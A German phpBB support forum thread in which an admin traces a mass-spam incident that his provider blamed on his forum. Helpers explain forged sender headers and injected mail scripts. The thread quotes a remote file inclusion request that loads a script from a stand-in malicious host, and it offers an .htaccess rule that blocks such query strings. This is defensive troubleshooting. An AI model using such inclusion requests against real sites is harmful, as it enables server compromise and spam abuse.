6000 kommerzielle Spam-Mails über phpBB 3.04

[andreas_ballhaus]

Hallo Leute,
ich will das nur mal so melden, ich glaube, das könnte (noch) interessant werden.
Das Forum läuft unter Version 3.0.4 mit Registrierung, die eine Aktivierung durch den Admin erfordert. Der Level waren 1-2 "Spam Registrierungen" / Tag. 95% der Beiträge sind in geschlossenen Benutzergruppen organisiert.

Gestern gab es Alarm vom Provider, 2000 Spams, Ärger mit Blacklist - Sicherheitslöcher stopfen. Auf Rückfrage und weiteren 3000 Spams (seine Aussage) kam folgende Mail:

Anbei ein Auszug aus dem Maillog File. Hier sehen Sie wie die Mails
eingeliefert werden. Anhand der Webnummer und der ID (27761) ist es
eindeutig:

May 28 08:51:22 s34-ffm-r02 postfix/qmgr[27761]: 5B55C480273:
from=<web14@integralis-forum.de>, size=1605, nrcpt=1 (queue active)
May 28 08:51:22 s34-ffm-r02 postfix/qmgr[27761]: 53AFA48025D: from=<>,
size=3863, nrcpt=1 (queue active)

Auf die Drohung, alle Domains zu sperren, habe ich die E-Mail-Funktionalität und die Registrierung deaktiviert.
Bisher ist Ruhe.

Da ich natürlich diese Funktionen gerne irgendwann wieder einschalten möchte, würde mich interessieren, ob diese Sicherheitslücke bekannt ist oder jemand weiß, was da passiert ist. Ich sehe folgende Möglichkeiten:

• Ein inaktiver Registrierter hat sich Zugriff auf die Mailfunktion verschafft
  Ein aktives Mitglied wurde gehackt
  Genereller Hack auf PHP 3.04

Noch ein paar Infos:

E-Mails über das Board versenden: deaktiviert
Name der E-Mail-Funktion: mail
Größe von E-Mail-Paketen: 50
SMTP-Server für E-Mail nutzen: nein

Hier sehen Sie die Auslieferung:

May 28 08:51:23 s34-ffm-r02 postfix/qmgr[27761]: 7A7A9480232:
to=<paypal@konto.de>, relay=none, delay=60081, delays=60080/0.1/0/0,
dsn=4.4.1, status=deferred (delivery temporarily suspended: connect to
mail.konto.de[87.106.36.175]: Connection refused)

[Dufftown]

Hallo,

und woraus soll sich da ergeben, dass das was mit dem Forum zu tun hat?

Da versucht sich höchstens jemand mit dem Mailserver in Deinem Account zu verbinden, nen Bezug zum phpBB seh ich da nicht.

[andreas_ballhaus]

Danke für den Hinweis,

from=<web14@integralis-forum.de>, size=1605, nrcpt=1 (queue active)

das ist immerhin die URL zum Forum.
Aber ich hatte auch schon den Verdacht, dass der Provider da überhaupt nicht durchblickt und mir was anhängen will. Mit den obigen Infos ist er erst bei der dritten Rückfrage herausgerückt - und ich kann seine Angaben nicht kontrollieren.

Besonders auch, da ich sonst keinerlei Meldungen über solche Hacks in den phpBB-Foren gefunden habe - und es ist recht unwahrscheinlich, dass ich der erste und einzige bei weltweit xxx installierten phpBB-Foren sein soll, der so massiv gehackt wird.

[Dufftown]

Das ist doch nur die Absenderadresse, die jemand vorgibt der sich irgendwie mit Deinem Mailserver verbindet. Mehr nicht.

Hast bestimmt schon Spammails mit Dir selbst als Absender bekommen. Da schreib ich Dir auch angela.merkel@bundeskanzleramt.de rein, oder was immer Du möchtest.

[oxpus]

Danke für den Hinweis,

from=<web14@integralis-forum.de>, size=1605, nrcpt=1 (queue active)

das ist immerhin die URL zum Forum.

Öhm, nein, das ist die Domain, auf der die E-Mail abzielt.

Aber ich hatte auch schon den Verdacht, dass der Provider da überhaupt nicht durchblickt und mir was anhängen will. Mit den obigen Infos ist er erst bei der dritten Rückfrage herausgerückt - und ich kann seine Angaben nicht kontrollieren.

Besonders auch, da ich sonst keinerlei Meldungen über solche Hacks in den phpBB-Foren gefunden habe - und es ist recht unwahrscheinlich, dass ich der erste und einzige bei weltweit xxx installierten phpBB-Foren sein soll, der so massiv gehackt wird.

Ich kann mir auch nicht vorstellen, dass das phpBB 3 solche Lücken hat, zumal ich im Bugtracker hierauf keinen direkten Hinweis finden kann.

Nur bei sovielen Spammails über das Forum würde der Server arg leiden und in die Knie gehen, daher tippe ich zunächst auch eher auf einen gehackten Serveraccount...

BTW: Die Header-Daten einer Email kann man nach Belieben ändern. Es wäre also irrelevant, ob dort als Absender "web14@integralis-forum.de" oder "lieschen müller" steht

Und wenn nun der Verdacht eines Hacks nahe liegt, schau mal hier rein: KB:gehackt

[coolsoft]

wenn die Mails tatsächlich über den Webspace versendet werden - was ich hier als nicht sicher ansehe, muss Dein Provider rausfinden -

Kuck mal mit ftp auf deinen Webspace - gerne wird in bekannten Verzeichnissen (includes, cache!) eine komplette Mailschleuder
installiert (über eine vorab eingeschleuste shell).
/cache darf keine Unterverzeichnisse enthalten,
die sonstige Struktur mit der Struktur des Inst-Paketes abgleichen.
die Namen der Schadfiles sind häufig ganz harmlos gewählt (nospam.php, oder ähnliches)
oder/und Forum lokal ziehen und mit mehreren Virenscannern durchforsten.

[andreas_ballhaus]

Liebe Forums-Mitglieder,
erst mal vielen Dank für eure Tipps, die Mühe und die Zeit - das ist heute alles nicht mehr selbsverständlich und - Danke.
Hier kurz als No-Reply, wie die Sache weiterging. Ich habe den Provider mit den Ergebnissen dieses Threads konfrontiert und folgendes erhalten:

Dann gehen wir die Logfiles durch (maillog und access log) und so finden
wir die Ursache.
90% der "Hacks" sehen in etwa wie folgt aus:
/integralis_net/buchungscenter/buchen_agb.php?id=http://urlzumboesenscript.de/inc.txt
Wenn das öfters im access log auftaucht haben Sie die Ursache.
10% der "Hacks" kommen durch unsichere Kontaktformulare.

Also ich bin nicht DER PHP-Fachmann, aber jetzt komme ich mir doch recht vergaggeiert vor: Ein aktives Spam-Email-Versende-Script über eine Variable einschleusen - das ist doch dann im Prinzip für alle PHP-Dateien möglich?
Die angegebene Datei macht nichts anderes als Text auszugeben und gibt die Variable id für den Rücksprung weiter und ist unverändert.
Da werde ich doch für dumm verkauft - oder?
Vom phpBB-Forum als Ursache ist plötzlich auch keine Rede mehr.

[coolsoft]

genau das ist möglich ...
bei ungesicherten scripten.
falls die gerufene URL ein http / ftp o.ä. beinhaltet und Du einen vernünftigen Provider hast:
das in die .htaccess im root:

Code: Alles auswählen

 RewriteEngine On 
 RewriteBase / 
 RewriteCond %{QUERY_STRING}   (.*)=http://(.*) 
 RewriteRule ^(.*)  - [F] 
 RewriteCond %{QUERY_STRING}   (.*)=ftp://(.*) 
 RewriteRule ^(.*)  - [F] 

[susi24]

Darf ich mich mit einreihen?
Ich versteh das ganze Kauderwelsch nicht so recht aber mein Thunderbird holte heute 46 Spammails vom Server. Catchall oder wie das heißt hab ich schon ausgestellt für die boardmail, aber ich kann immernoch irgendwas@domainname.de eingeben und bekomme vom provider die entsprechende fehlermail "Mail delivery failed: returning message to sender" auf meine andere mailaddy weitergeleitet.

wie kann ich das noch gleich abstellen damit ich die ollen mails nich mehr bekomme?

[coolsoft]

das ist eine ganz andere Baustelle.
Kuck mal die diversen Threads zu spamregistations durch